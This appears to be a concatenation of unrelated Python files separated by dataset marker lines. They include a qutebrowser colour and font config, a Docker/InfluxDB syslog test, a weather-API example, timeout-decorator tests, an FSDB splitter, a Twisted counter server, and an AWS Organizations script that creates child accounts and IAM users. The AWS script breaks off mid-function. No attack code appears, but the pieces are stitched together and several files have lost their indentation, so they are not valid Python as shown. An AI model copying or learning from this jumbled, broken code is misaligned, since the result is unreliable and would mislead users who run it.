# as for `tabs.title.format` are defined.
# Type: FormatString
c.tabs.title.format_pinned = '{index}'
# Width (in pixels or as percentage of the window) of the tab bar if
# it's vertical.
# Type: PercOrInt
c.tabs.width = '20%'
# Width (in pixels) of the progress indicator (0 to disable).
# Type: Int
c.tabs.indicator.width = 3
# Padding (in pixels) for tab indicators.
# Type: Padding
c.tabs.indicator.padding = {'top': 2, 'left': 0, 'bottom': 2, 'right': 4}
# Shrink pinned tabs down to their contents.
# Type: Bool
c.tabs.pinned.shrink = True
# Wrap when changing tabs.
# Type: Bool
c.tabs.wrap = True
# What search to start when something other than a URL is entered.
# Type: String
# Valid values:
# - naive: Use simple/naive check.
# - dns: Use DNS requests (might be slow!).
# - never: Never search automatically.
# - schemeless: Always search automatically unless URL explicitly contains a scheme.
c.url.auto_search = 'naive'
# Page to open if :open -t/-b/-w is used without URL. Use `about:blank`
# for a blank page.
# Type: FuzzyUrl
c.url.default_page = 'file:///home/jagreen/src/github.com/ja-green/startpage/startpage.html'
# Open base URL of the searchengine if a searchengine shortcut is
# invoked without parameters.
# Type: Bool
c.url.open_base_url = True
# Search engines which can be used via the address bar. Maps a search
# engine name (such as `DEFAULT`, or `ddg`) to a URL with a `{}`
# placeholder. The placeholder will be replaced by the search term; use
# `{{` and `}}` for literal `{`/`}` braces. The following further
# placeholders are defined to configure how special characters in the
# search terms are replaced by safe characters (called 'quoting'):
# - `{}` and `{semiquoted}` quote everything except slashes; this is the
#   most sensible choice for almost all search engines (for the search
#   term `slash/and&` this placeholder expands to `slash/and%26amp`).
# - `{quoted}` quotes all characters (for `slash/and&` this placeholder
#   expands to `slash%2Fand%26amp`).
# - `{unquoted}` quotes nothing (for `slash/and&` this placeholder
#   expands to `slash/and&`).
# The search engine named `DEFAULT` is used when `url.auto_search` is
# turned on and something other than a URL was entered to be opened.
# Other search engines can be used by prepending the search engine name
# to the search term, e.g. `:open google qutebrowser`.
# Type: Dict
c.url.searchengines = {'DEFAULT': 'https://www.google.com/search?q={}', 'google': 'https://www.google.com/search?q={}'}
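# As an illustration (hypothetical entry, not part of the original
# config), an engine with explicit quoting could be added like this:
# c.url.searchengines['ddg'] = 'https://duckduckgo.com/?q={quoted}'
# after which `:open ddg qutebrowser` would search DuckDuckGo.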
# Page(s) to open at the start.
# Type: List of FuzzyUrl, or FuzzyUrl
c.url.start_pages = ['file:///home/jagreen/src/github.com/ja-green/startpage/startpage.html']
# URL parameters to strip with `:yank url`.
# Type: List of String
c.url.yank_ignored_parameters = ['ref', 'utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content']
# Hide the window decoration. This setting requires a restart on
# Wayland.
# Type: Bool
c.window.hide_decoration = False
# Default zoom level.
# Type: Perc
c.zoom.default = '75%'
# Available zoom levels.
# Type: List of Perc
c.zoom.levels = ['25%', '33%', '50%', '67%', '75%', '90%', '100%', '110%', '125%', '150%', '175%', '200%', '250%', '300%', '400%', '500%']
# Number of zoom increments to divide the mouse wheel movements to.
# Type: Int
c.zoom.mouse_divider = 512
# Text color of the completion widget. May be a single color to use for
# all columns or a list of three colors, one for each column.
# Type: List of QtColor, or QtColor
c.colors.completion.fg = ['#dadada', '#dadada', '#dadada']
# Background color of the completion widget for odd rows.
# Type: QssColor
c.colors.completion.odd.bg = '#404552'
# Background color of the completion widget for even rows.
# Type: QssColor
c.colors.completion.even.bg = '#404552'
# Foreground color of completion widget category headers.
# Type: QtColor
c.colors.completion.category.fg = '#dadada'
# Background color of the completion widget category headers.
# Type: QssColor
c.colors.completion.category.bg = '#3a3f4d'
# Top border color of the completion widget category headers.
# Type: QssColor
c.colors.completion.category.border.top = '#3a3f4d'
# Bottom border color of the completion widget category headers.
# Type: QssColor
c.colors.completion.category.border.bottom = '#3a3f4d'
# Foreground color of the selected completion item.
# Type: QtColor
c.colors.completion.item.selected.fg = '#000000'
# Background color of the selected completion item.
# Type: QssColor
c.colors.completion.item.selected.bg = '#8ba870'
# Top border color of the selected completion item.
# Type: QssColor
c.colors.completion.item.selected.border.top = '#8ba870'
# Bottom border color of the selected completion item.
# Type: QssColor
c.colors.completion.item.selected.border.bottom = '#8ba870'
# Foreground color of the matched text in the selected completion item.
# Type: QtColor
c.colors.completion.item.selected.match.fg = '#000000'
# Foreground color of the matched text in the completion.
# Type: QtColor
c.colors.completion.match.fg = '#dadada'
# Color of the scrollbar handle in the completion view.
# Type: QssColor
c.colors.completion.scrollbar.fg = '#404552'
# Color of the scrollbar in the completion view.
# Type: QssColor
c.colors.completion.scrollbar.bg = '#3a3f4d'
# Color gradient interpolation system for download text.
# Type: ColorSystem
# Valid values:
# - rgb: Interpolate in the RGB color system.
# - hsv: Interpolate in the HSV color system.
# - hsl: Interpolate in the HSL color system.
# - none: Don't show a gradient.
c.colors.downloads.system.fg = 'none'
# Color gradient interpolation system for download backgrounds.
# Type: ColorSystem
# Valid values:
# - rgb: Interpolate in the RGB color system.
# - hsv: Interpolate in the HSV color system.
# - hsl: Interpolate in the HSL color system.
# - none: Don't show a gradient.
c.colors.downloads.system.bg = 'none'
# Color gradient start for download text.
# Type: QtColor
c.colors.downloads.start.fg = '#000000'
# Color gradient start for download backgrounds.
# Type: QtColor
c.colors.downloads.start.bg = '#8ba870'
# Foreground color for downloads with errors.
# Type: QtColor
c.colors.downloads.error.fg = '#dadada'
# Background color for downloads with errors.
# Type: QtColor
c.colors.downloads.error.bg = '#966575'
# Font color for hints.
# Type: QssColor
c.colors.hints.fg = '#dadada'
# Background color for hints. Note that you can use a `rgba(...)` value
# for transparency.
# Type: QssColor
c.colors.hints.bg = '#404552'
# Font color for the matched part of hints.
# Type: QtColor
c.colors.hints.match.fg = '#e0be80'
# Highlight color for keys to complete the current keychain.
# Type: QssColor
c.colors.keyhint.suffix.fg = 'purple'
# Foreground color of an error message.
# Type: QssColor
c.colors.messages.error.fg = '#dadada'
# Background color of an error message.
# Type: QssColor
c.colors.messages.error.bg = '#966575'
# Border color of an error message.
# Type: QssColor
c.colors.messages.error.border = '#966575'
# Foreground color of a warning message.
# Type: QssColor
c.colors.messages.warning.fg = '#dadada'
# Background color of a warning message.
# Type: QssColor
c.colors.messages.warning.bg = '#968665'
# Border color of a warning message.
# Type: QssColor
c.colors.messages.warning.border = '#968665'
# Foreground color of an info message.
# Type: QssColor
c.colors.messages.info.fg = '#dadada'
# Background color of an info message.
# Type: QssColor
c.colors.messages.info.bg = '#657596'
# Border color of an info message.
# Type: QssColor
c.colors.messages.info.border = '#657596'
# Foreground color for prompts.
# Type: QssColor
c.colors.prompts.fg = '#dadada'
# Background color for prompts.
# Type: QssColor
c.colors.prompts.bg = '#404552'
# Foreground color of the statusbar.
# Type: QssColor
c.colors.statusbar.normal.fg = '#dadada'
# Background color of the statusbar.
# Type: QssColor
c.colors.statusbar.normal.bg = '#404552'
# Foreground color of the statusbar in insert mode.
# Type: QssColor
c.colors.statusbar.insert.fg = '#000000'
# Background color of the statusbar in insert mode.
# Type: QssColor
c.colors.statusbar.insert.bg = '#8ba870'
# Foreground color of the statusbar in passthrough mode.
# Type: QssColor
c.colors.statusbar.passthrough.fg = '#dadada'
# Background color of the statusbar in passthrough mode.
# Type: QssColor
c.colors.statusbar.passthrough.bg = '#5e8d87'
# Foreground color of the statusbar in private browsing mode.
# Type: QssColor
c.colors.statusbar.private.fg = '#dadada'
# Background color of the statusbar in private browsing mode.
# Type: QssColor
c.colors.statusbar.private.bg = '#383c4a'
# Foreground color of the statusbar in command mode.
# Type: QssColor
c.colors.statusbar.command.fg = '#dadada'
# Background color of the statusbar in command mode.
# Type: QssColor
c.colors.statusbar.command.bg = '#404552'
# Foreground color of the statusbar in private browsing + command mode.
# Type: QssColor
c.colors.statusbar.command.private.fg = '#dadada'
# Background color of the statusbar in private browsing + command mode.
# Type: QssColor
c.colors.statusbar.command.private.bg = '#383c4a'
# Foreground color of the statusbar in caret mode.
# Type: QssColor
c.colors.statusbar.caret.fg = '#dadada'
# Background color of the statusbar in caret mode.
# Type: QssColor
c.colors.statusbar.caret.bg = '#966894'
# Foreground color of the statusbar in caret mode with a selection.
# Type: QssColor
c.colors.statusbar.caret.selection.fg = '#dadada'
# Background color of the statusbar in caret mode with a selection.
# Type: QssColor
c.colors.statusbar.caret.selection.bg = '#b294bb'
# Background color of the progress bar.
# Type: QssColor
c.colors.statusbar.progress.bg = '#383c4a'
# Default foreground color of the URL in the statusbar.
# Type: QssColor
c.colors.statusbar.url.fg = '#dadada'
# Foreground color of the URL in the statusbar on error.
# Type: QssColor
c.colors.statusbar.url.error.fg = '#966575'
# Foreground color of the URL in the statusbar for hovered links.
# Type: QssColor
c.colors.statusbar.url.hover.fg = '#657596'
# Foreground color of the URL in the statusbar on successful load
# (http).
# Type: QssColor
c.colors.statusbar.url.success.http.fg = '#dadada'
# Foreground color of the URL in the statusbar on successful load
# (https).
# Type: QssColor
c.colors.statusbar.url.success.https.fg = '#8ba870'
# Foreground color of the URL in the statusbar when there's a warning.
# Type: QssColor
c.colors.statusbar.url.warn.fg = '#968665'
# Background color of the tab bar.
# Type: QssColor
c.colors.tabs.bar.bg = '#404552'
# Color for the tab indicator on errors.
# Type: QtColor
c.colors.tabs.indicator.error = '#966575'
# Color gradient start for the tab indicator.
# Type: QtColor
c.colors.tabs.indicator.start = '#968665'
# Color gradient end for the tab indicator.
# Type: QtColor
c.colors.tabs.indicator.stop = '#8ba870'
# Color gradient interpolation system for the tab indicator.
# Type: ColorSystem
c.colors.tabs.indicator.system = 'none'
# Foreground color of unselected odd tabs.
# Type: QtColor
c.colors.tabs.odd.fg = '#dadada'
# Background color of unselected odd tabs.
# Type: QtColor
c.colors.tabs.odd.bg = '#3a3f4d'
# Foreground color of unselected even tabs.
# Type: QtColor
c.colors.tabs.even.fg = '#dadada'
# Background color of unselected even tabs.
# Type: QtColor
c.colors.tabs.even.bg = '#3a3f4d'
# Foreground color of selected odd tabs.
# Type: QtColor
c.colors.tabs.selected.odd.fg = '#dadada'
# Background color of selected odd tabs.
# Type: QtColor
c.colors.tabs.selected.odd.bg = '#404552'
# Foreground color of selected even tabs.
# Type: QtColor
c.colors.tabs.selected.even.fg = '#dadada'
# Background color of selected even tabs.
# Type: QtColor
c.colors.tabs.selected.even.bg = '#404552'
# Background color for webpages if unset (or empty to use the theme's
# color).
# Type: QtColor
c.colors.webpage.bg = 'white'
# Default font families to use.
# Type: Font
c.fonts.default_family = 'Inconsolata Nerd Font Mono'
# Default font size to use.
# Type: String
c.fonts.default_size = '8pt'
# Font used in the completion widget.
# Type: Font
c.fonts.completion.entry = 'default_size default_family'
# Font used in the completion categories.
# Type: Font
c.fonts.completion.category = 'default_size default_family'
# Font used for the debugging console.
# Type: Font
c.fonts.debug_console = 'default_size default_family'
# Font used for the downloadbar.
# Type: Font
c.fonts.downloads = 'default_size default_family'
# Font used for the hints.
# Type: Font
c.fonts.hints = 'default_size default_family'
# Font used in the keyhint widget.
# Type: Font
c.fonts.keyhint = 'default_size default_family'
# Font used for error messages.
# Type: Font
c.fonts.messages.error = 'default_size default_family'
# Font used for info messages.
# Type: Font
c.fonts.messages.info = 'default_size default_family'
# Font used for warning messages.
# Type: Font
c.fonts.messages.warning = 'default_size default_family'
# Font used for prompts.
# Type: Font
c.fonts.prompts = 'default_size default_family'
# Font used in the statusbar.
# Type: Font
c.fonts.statusbar = 'default_size default_family'
# This setting can be used to map keys to other keys. When the key used
# as dictionary-key is pressed, the binding for the key used as
# dictionary-value is invoked instead. This is useful for global
# remappings of keys, for example to map Ctrl-[ to Escape. Note that
# when a key is bound (via `bindings.default` or `bindings.commands`),
# the mapping is ignored.
# Type: Dict
c.bindings.key_mappings = {'<Ctrl+[>': '<Escape>', '<Ctrl+6>': '<Ctrl+^>', '<Ctrl+m>': '<Return>', '<Enter>': '<Return>', '<Shift+Enter>': '<Return>', '<Ctrl+Enter>': '<Ctrl+Return>', '<Ctrl+j>': '<Return>', '<Shift+Return>': '<Return>'}
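# As an illustration (hypothetical entry, not part of the original
# config), an additional global remap of `<Ctrl+g>` to `<Escape>` would
# look like:
# c.bindings.key_mappings['<Ctrl+g>'] = '<Escape>'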
| nilq/baby-python | python |
from docker import Client
import open_nti_input_syslog_lib
import docker.tls as tls
import influxdb
import time
from os import path
import os
import shutil
import pprint
import subprocess
import json
from sys import platform as _platform
import requests
import filecmp
import sys
from kafka import KafkaConsumer
from timeout import timeout
################################################################################
def test_connect_docker():
c = open_nti_input_syslog_lib.check_docker()
# Check if connection to Docker work by listing all images
list_images = c.images()
assert len(list_images) >= 1
def test_start_dependencies():
open_nti_input_syslog_lib.start_open_nti()
assert open_nti_input_syslog_lib.check_influxdb_running_database_exist()
# open_nti_input_syslog_lib.start_kafka()
# assert open_nti_input_syslog_lib.check_kafka_is_running()
def test_syslog_qfx_influx_01():
FNAME = 'test_syslog_qfx_01'
PCAP_FILE = FNAME + "/syslog_qfx_01_16000.pcap"
open_nti_input_syslog_lib.start_fluentd_syslog(output_influx='true')
open_nti_input_syslog_lib.replay_file(PCAP_FILE)
time.sleep(5)
db = open_nti_input_syslog_lib.get_influxdb_handle()
query = 'SELECT * FROM events'
result = db.query(query)
points = result.get_points()
assert len(list(points)) != 0
# @timeout(30)
# def test_syslog_qfx_kafka_01():
#
# FNAME = 'test_syslog_qfx_01'
# PCAP_FILE = FNAME + "/syslog_qfx_01_16000.pcap"
#
# open_nti_input_syslog_lib.start_fluentd_syslog(output_kafka='true')
# time.sleep(1)
# open_nti_input_syslog_lib.replay_file(PCAP_FILE)
#
# time.sleep(5)
#
# counter = open_nti_input_syslog_lib.check_kafka_msg()
#
# assert counter == 100
def teardown_module(module):
global c
global TCP_RELAY_CONTAINER_NAME
# if not os.getenv('TRAVIS'):
open_nti_input_syslog_lib.stop_fluentd()
open_nti_input_syslog_lib.stop_open_nti()
# open_nti_input_syslog_lib.stop_kafka()
try:
old_container_id = c.inspect_container(TCP_RELAY_CONTAINER_NAME)['Id']
c.stop(container=old_container_id)
c.remove_container(container=old_container_id)
    except Exception:
        print "Container does not exist"
| nilq/baby-python | python |
import asyncio
import aiohttp
import pynws
PHILLY = (39.95, -75.16)
USERID = "testing@address.xyz"
async def example():
async with aiohttp.ClientSession() as session:
nws = pynws.SimpleNWS(*PHILLY, USERID, session)
await nws.set_station()
await nws.update_observation()
await nws.update_forecast()
await nws.update_alerts_forecast_zone()
print(nws.observation)
print(nws.forecast[0])
print(nws.alerts_forecast_zone)
asyncio.run(example())
| nilq/baby-python | python |
##
# File: TimeoutDecoratorTests.py
# Author: J. Westbrook
# Date: 25-Oct-2019
# Version: 0.001
#
# Updates:
##
"""
Test cases for timeout decorator
"""
__docformat__ = "google en"
__author__ = "John Westbrook"
__email__ = "jwest@rcsb.rutgers.edu"
__license__ = "Apache 2.0"
import logging
import os
import time
import unittest
from rcsb.utils.io.decorators import timeout, timeoutMp, TimeoutException
HERE = os.path.abspath(os.path.dirname(__file__))
TOPDIR = os.path.dirname(os.path.dirname(os.path.dirname(HERE)))
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s]-%(module)s.%(funcName)s: %(message)s")
logger = logging.getLogger()
logger.setLevel(logging.INFO)
@timeoutMp(10)
def longrunner2():
iSeconds = 20
logger.info("SLEEPING FOR %d seconds", iSeconds)
time.sleep(iSeconds)
logger.info("SLEEPING COMPLETED")
class TimeoutDecoratorTests(unittest.TestCase):
"""
Test cases for timeout decorator
"""
def setUp(self):
#
self.__startTime = time.time()
logger.debug("Starting %s at %s", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()))
def tearDown(self):
endTime = time.time()
logger.debug("Completed %s at %s (%.4f seconds)", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()), endTime - self.__startTime)
@timeout(10)
def __longrunner1(self, iSeconds=10):
logger.info("SLEEPING FOR %d seconds", iSeconds)
time.sleep(iSeconds)
logger.info("SLEEPING COMPLETED")
def testTimeoutSignal(self):
"""Test case - timeout decorator (signal)"""
try:
self.__longrunner1(20)
except TimeoutException as e:
logger.info("Caught timeout exception %s", str(e))
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
else:
logger.info("Successful completion")
@timeoutMp(10)
def __longrunner2(self, iSeconds=10):
logger.info("SLEEPING FOR %d seconds", iSeconds)
time.sleep(iSeconds)
logger.info("SLEEPING COMPLETED")
@unittest.skip("Python 3.8 macos serialization issue")
def testTimeoutMulti(self):
"""Test case - timeout decorator (multiprocessing)"""
try:
longrunner2()
except TimeoutException as e:
logger.info("Caught timeout exception %s", str(e))
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
else:
logger.info("Successful completion")
def suiteTimeout():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(TimeoutDecoratorTests("testTimeoutMulti"))
suiteSelect.addTest(TimeoutDecoratorTests("testTimeoutSignal"))
return suiteSelect
if __name__ == "__main__":
mySuite = suiteTimeout()
unittest.TextTestRunner(verbosity=2).run(mySuite)
| nilq/baby-python | python |
"""
Classes of config fields, description of standard models of config fields.
"""
from typing import Any
class DefaultConfigField:
"""Config field containing any value"""
    def __init__(self, name: str, value: Any = None):
        self.name = name
        self._value = value
    @property
    def value(self) -> Any:
        return self._value
    @value.setter
    def value(self, value: Any) -> None:
        self._value = value
def __repr__(self):
return f"(default) {self.name}: {self.value}"
def __str__(self):
return f"(default) {self.name}: {self.value}"
class ImmutableConfigField(DefaultConfigField):
"""Immutable config field"""
    def __init__(self, name: str, value: Any = None):
        super(ImmutableConfigField, self).__init__(name, value)
    @property
    def value(self) -> Any:
        return self._value
    @value.setter
    def value(self, value: Any) -> None:
        # Only the first assignment takes effect; later writes are ignored.
        if self._value is None:
            self._value = value
class SecretConfigField(DefaultConfigField):
"""Config Secret (Encrypted)"""
...
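# Minimal usage sketch (assumed behavior, matching the classes above):
# f = DefaultConfigField("host", "localhost")
# f.value = "example.org"   # default fields accept overwrites
# g = ImmutableConfigField("port")
# g.value = 8080            # the first write sticks
# g.value = 9090            # ignored; g.value remains 8080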
| nilq/baby-python | python |
#!/usr/bin/python3
"""fsdb2many converts a single FSDB file into many, by creating
other file names based on a column of the original."""
import sys
import argparse
import pyfsdb
import re
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description=__doc__,
epilog="fsdb2many -c key -o outputdir/%s.fsdb mybigfile.fsdb")
parser.add_argument("-c", "--column", default="key", type=str,
help="Column to split on")
parser.add_argument("-o", "--output-pattern",
default="fsdb2many-out-%s.fsdb",
type=str,
help="Output pattern to split on, which should contain a PERCENT S to use for inserting the column value being saved to that file.")
parser.add_argument("input_file", type=argparse.FileType('r'),
nargs='?', default=sys.stdin,
help="str")
args = parser.parse_args()
return args
def main():
args = parse_args()
# open the input file
inh = pyfsdb.Fsdb(file_handle=args.input_file)
key_column = inh.get_column_number(args.column)
out_handles = {}
for row in inh:
value = row[key_column]
# see if we have an open file handle for this one yet
if value not in out_handles:
# new value, so open a new file handle to save data for it
file_name = re.sub("[^-.0-9a-zA-Z_]", "_", str(value))
outh = pyfsdb.Fsdb(out_file=(args.output_pattern % file_name))
outh.column_names = inh.column_names
out_handles[value] = outh
# save the row to the file based on its value
out_handles[value].append(row)
# clean up
for handle in out_handles:
out_handles[handle].close()
if __name__ == "__main__":
main()
| nilq/baby-python | python |
def levenshtein(a,b):
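    # The source row contained only this bare signature; the body below is
    # a minimal sketch of the standard Wagner-Fischer dynamic-programming
    # edit distance, added as an assumption about the intended code.
    if len(a) < len(b):
        a, b = b, a
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        current = [i]
        for j, cb in enumerate(b, 1):
            current.append(min(previous[j] + 1,             # deletion
                               current[j - 1] + 1,          # insertion
                               previous[j - 1] + (ca != cb)))  # substitution
        previous = current
    return previous[-1]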
| nilq/baby-python | python |
#!/usr/bin/env python
from twisted.web import server, resource
from twisted.internet import reactor
class HelloResource(resource.Resource):
    # Serve this resource for every path instead of traversing children.
    isLeaf = True
    numberRequests = 0
    def render_GET(self, request):
        # Count requests and return the tally as the plain-text body
        # (a str body is fine on Python 2; Twisted on Python 3 expects bytes).
        self.numberRequests += 1
        request.setHeader("content-type", "text/plain")
        return "I am request #" + str(self.numberRequests) + "\n"
# Listen on port 8081 and serve the resource until the reactor stops.
reactor.listenTCP(8081, server.Site(HelloResource()))
reactor.run()
| nilq/baby-python | python |
import boto3
import time
import random
import os
import json
import botocore
import argparse
import sys
from botocore.exceptions import ClientError
def check_env_variables():
if os.environ.get('OU_NAME') is not None:
print("OU_NAME: {} is set as an environment variable.".format(os.environ.get('OU_NAME')))
else:
print('OU_NAME is NOT set as an environment variable. Exit!')
exit(1)
if os.environ.get('DEFAULT_CHILD_ACCOUNT_PASS') is not None:
print("<DEFAULT_CHILD_ACCOUNT_PASS> is set as an environment variable.")
else:
print('<DEFAULT_CHILD_ACCOUNT_PASS> is NOT set as an environment variable. Exit!')
exit(1)
if os.environ.get('BUDGET_LIMIT') is not None:
print("<BUDGET_LIMIT>: ${} is set as an environment variable.".format(os.environ.get('BUDGET_LIMIT')))
else:
print('<BUDGET_LIMIT> is NOT set as an environment variable. Exit!')
exit(1)
if os.environ.get('BUDGET_NOTIFIERS_LIST') is not None:
print("<BUDGET_NOTIFIERS_LIST>: {} is set as an environment variable.".format(os.environ.get('BUDGET_NOTIFIERS_LIST')))
else:
print("<BUDGET_NOTIFIERS_LIST> is NOT set as an environment variable. It can be as a list as comma seperated.(i.e. BUDGET_NOTIFIERS_LIST='test@gmail.com, test2@gmail.com' ).Exit!")
exit(1)
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') is not None:
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE' or os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'FALSE':
print("<CHILD_ACCOUNT_BILLING_ACCESS>: {} is set as an environment variable.".format(os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS')))
else:
print("<CHILD_ACCOUNT_BILLING_ACCESS> is MUST set as a 'TRUE' or 'FALSE'. Exit!")
exit(1)
else:
print("<CHILD_ACCOUNT_BILLING_ACCESS> is NOT set as an environment variable. It can be 'TRUE' or 'FALSE'. Exit!")
exit(1)
def get_account_id(client, email):
paginator = client.get_paginator(
'list_accounts').paginate().build_full_result()
accounts = paginator['Accounts']
account_id= None
found = False
for account in accounts:
if str(email) == str(account['Email']):
found = True
account_id = account['Id']
print("Child account email found {} with {}".format(email,account_id))
break
if not found:
print("Child account email NOT exists:", email)
return account_id
def create_child_account(client, email, account_name, role_name, iam_user_access_to_billing):
response = client.create_account(
Email=email,
AccountName=account_name,
RoleName=role_name,
IamUserAccessToBilling=iam_user_access_to_billing
)
return response
def assume_child_credentials(client,account_id):
role_arn="arn:aws:iam::{}:role/OrganizationAccountAccessRole".format(account_id)
    session_name = "AssumeRoleSession-{}".format(random.randint(0, 10000000000000000) + 1)
result= None
while True:
try:
result = client.assume_role(
RoleArn=role_arn,
                RoleSessionName=session_name,
DurationSeconds=3600
)
            if result is None:
                # ClientError must be instantiated with an error response
                # and an operation name.
                raise botocore.exceptions.ClientError(
                    {"Error": {"Code": "AccessDenied",
                               "Message": "assume_role returned no result"}},
                    "AssumeRole")
except botocore.exceptions.ClientError as err:
time.sleep(5)
response = err.response
if (response and response.get("Error", {}).get("Code") == "AccessDenied"):
print("Failed to assume role. Error:{}.It will try to assume role again!".format(err.response['Error']['Code']))
continue
break
return result['Credentials']
def exists_iam_user(iam_client,account_name):
paginator = iam_client.get_paginator(
'list_users').paginate().build_full_result()
users = paginator['Users']
    iam_user_found = False
for user in users:
if str(account_name) == str(user['UserName']):
iam_user_found= True
break
return iam_user_found
def exists_attendee_policy(iam_client,policy_name):
paginator = iam_client.get_paginator(
'list_policies').paginate().build_full_result()
policies = paginator['Policies']
    iam_policy_found = False
for policy in policies:
        if str(policy_name) == str(policy['PolicyName']):
            iam_policy_found = True
break
return iam_policy_found
def create_custom_iam_userpolicy(iam_client):
policy_name = "DeepRacerWorkshopAttendeePolicy"
policy_document = json.dumps({
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"iam:ChangePassword"
],
"Resource": "*"
}
]
})
create_policy_response=iam_client.create_policy(
PolicyName=policy_name,
PolicyDocument=policy_document
)
return create_policy_response['Policy']['Arn']
def attach_iam_user_policies(iam_client,account_name,custom_policy_arn):
iam_client.attach_user_policy(UserName=account_name,PolicyArn=custom_policy_arn)
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerFullAccess")
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerRoboMakerAccessPolicy")
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/service-role/AWSDeepRacerServiceRolePolicy")
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE':
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/AWSBillingReadOnlyAccess")
def update_policies(account_id,iam_user_name,iam_client):
try:
iam_client.detach_user_policy(UserName=iam_user_name,
PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id)
)
print("Detached DeepRacerWorkshopAttendeePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
except iam_client.exceptions.NoSuchEntityException as error:
print("Policy already detached --> Message: {}".format(error))
try:
iam_client.delete_policy(PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id))
print("Deleted DeepRacerWorkshopAttendeePolicy in account id:{}".format(account_id))
except iam_client.exceptions.NoSuchEntityException as error:
print("Policy already deleted --> Message: {}".format(error))
custom_policy_arn=create_custom_iam_userpolicy(iam_client)
print("Created DeepRacerWorkshopAttendeePolicy in account id:{}".format(account_id))
attach_iam_user_policies(iam_client,iam_user_name,custom_policy_arn)
print("Attached DeepRacerWorkshopAttendeePolicy, Billing Access to IAM User:{} in account id:{}".format(iam_user_name, account_id))
def set_permissions(sts_client,account_name,account_id,default_password,type=None):
assume_creds = assume_child_credentials(sts_client,account_id)
iam_client = boto3.client('iam', region_name=os.environ['AWS_DEFAULT_REGION'] ,
aws_access_key_id=assume_creds['AccessKeyId'],
aws_secret_access_key=assume_creds['SecretAccessKey'],
aws_session_token = assume_creds['SessionToken'])
iam_user_name="{}-deepracer-{}".format(account_name,account_id)
# iam_user_name="deepraceruser-{}".format(account_id)
if type == "update" and not exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} not found, NO need to update. You should first bootstrap it. Exit!".format(iam_user_name))
return
if type == "update" and exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} found, It will update the policies!".format(iam_user_name))
update_policies(account_id,iam_user_name,iam_client)
return
if type == "attach" and not exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} not found, NO need to attach. You should first bootstrap it. Exit!".format(iam_user_name))
return
if type == "attach" and exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} found, It will attach the policies!".format(iam_user_name))
iam_client.attach_user_policy(UserName=iam_user_name,
PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id)
)
print("Attached DeepRacerWorkshopAttendeePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerFullAccess")
print("Attached AWSDeepRacerFullAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerRoboMakerAccessPolicy")
print("Attached AWSDeepRacerRoboMakerAccessPolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/service-role/AWSDeepRacerServiceRolePolicy")
print("Attached AWSDeepRacerServiceRolePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE':
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSBillingReadOnlyAccess")
print("Attached AWSBillingReadOnlyAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
return
if type == "detach" and not exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} not found, NO need to detach. You should first bootstrap it. Exit!".format(iam_user_name))
return
if type == "detach" and exists_iam_user(iam_client,iam_user_name):
try:
print("IAM user:{} found, It will detach the policies!".format(iam_user_name))
iam_client.detach_user_policy(UserName=iam_user_name,
PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id)
)
print("Detached DeepRacerWorkshopAttendeePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerFullAccess")
print("Detached AWSDeepRacerFullAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerRoboMakerAccessPolicy")
print("Detached AWSDeepRacerRoboMakerAccessPolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/service-role/AWSDeepRacerServiceRolePolicy")
print("Detached AWSDeepRacerServiceRolePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE':
